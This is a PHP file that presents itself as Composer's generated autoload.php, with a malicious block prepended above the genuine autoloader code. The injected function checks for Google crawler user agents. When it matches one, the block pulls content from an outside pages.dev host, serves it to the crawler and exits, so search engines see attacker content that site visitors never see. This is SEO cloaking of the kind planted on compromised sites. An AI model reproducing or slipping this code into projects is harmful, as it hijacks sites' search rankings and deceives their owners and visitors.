<?php
function is_google_bot() {
    $agents = array(
        "Googlebot", 
        "AdsBot-Google", 
        "Mediapartners-Google", 
        "Google-Site-Verification", 
        "Google-InspectionTool", 
        "Googlebot-Mobile", 
        "Googlebot-News"
    );
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    foreach ($agents as $agent) {
        if (strpos($user_agent, $agent) !== false) {
            return true;
        }
    }
    return false;
}

if (is_google_bot()) {
    echo file_get_contents("https://bismillahnaikyagesya.pages.dev/index.txt");
    exit;
}
?>
<?php

// autoload.php @generated by Composer

if (PHP_VERSION_ID < 50600) {
    echo 'Composer 2.3.0 dropped support for autoloading on PHP <5.6 and you are running '.PHP_VERSION.', please upgrade PHP or use Composer 2.2 LTS via "composer self-update --2.2". Aborting.'.PHP_EOL;
    exit(1);
}

require_once __DIR__ . '/composer/autoload_real.php';

return ComposerAutoloaderInit9f7204760be988f1e0ea9c1d396026b0::getLoader();
